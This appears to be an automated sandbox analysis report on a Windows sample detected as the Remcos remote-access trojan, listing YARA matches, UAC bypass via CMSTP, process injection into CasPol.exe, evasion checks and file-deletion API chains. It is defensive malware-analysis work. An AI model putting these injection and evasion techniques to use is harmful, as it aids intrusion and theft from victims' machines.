          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: C1ZsNxSer8.exe | Static PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
          Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@4/1@2/2
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Code function: 1_2_00007FF774A12A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\chrome-E2SMAR
          Source: C1ZsNxSer8.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C1ZsNxSer8.exe | ReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | File read: C:\Users\user\Desktop\C1ZsNxSer8.exe
          Source: unknown | Process created: C:\Users\user\Desktop\C1ZsNxSer8.exe "C:\Users\user\Desktop\C1ZsNxSer8.exe"
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Section loaded: profapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: urlmon.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wininet.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iertutil.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: srvcli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: netutils.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rstrtmgr.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: profapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winhttp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winnsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
          Source: C1ZsNxSer8.exe | Static PE information: Image base 0x140000000 > 0x60000000
          Source: C1ZsNxSer8.exe | Static file information: File size 2673152 > 1048576
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: C1ZsNxSer8.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C1ZsNxSer8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C1ZsNxSer8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: C1ZsNxSer8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: C1ZsNxSer8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: C1ZsNxSer8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: C1ZsNxSer8.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
          Source: C1ZsNxSer8.exe | Static PE information: section name: .managed
          Source: C1ZsNxSer8.exe | Static PE information: section name: hydrated
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00457106 push ecx; ret 6_2_00457119
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0045B11A push esp; ret 6_2_0045B141
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0045E54D push esi; ret 6_2_0045E556
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00457A28 push eax; ret 6_2_00457A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00434E56 push ecx; ret 6_2_00434E69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00406EB0 ShellExecuteW,URLDownloadToFileW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040F7A7 Sleep,ExitProcess
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory allocated: 145BBD80000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle 6_2_0041A748
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 4908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 5082
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340 | Thread sleep count: 4908 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340 | Thread sleep time: -14724000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340 | Thread sleep count: 5082 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4340 | Thread sleep time: -15246000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0044E879 FindFirstFileExA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040783C FindFirstFileW,FindNextFileW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Code function: 1_2_00007FF774A126B0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask
          Source: C1ZsNxSer8.exe | Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node graph_6-48845
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_004432B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00412077 GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Code function: 1_2_00007FF774A05760 RtlAddVectoredExceptionHandler
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Code function: 1_2_00007FF774A69A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00434B47 SetUnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B96008
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 6_2_004120F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 6_2_00419627 mouse_event
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerAc
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exe | Code function: 1_2_00007FF774A05410 cpuid
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: GetLocaleInfoA 6_2_0040F8D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: EnumSystemLocalesW 6_2_00452036
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW 6_2_004520C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: GetLocaleInfoW 6_2_00452313
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: EnumSystemLocalesW 6_2_00448404
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0045243C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,6_2_00452543
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00452610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,6_2_004488ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00451CD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00451F50
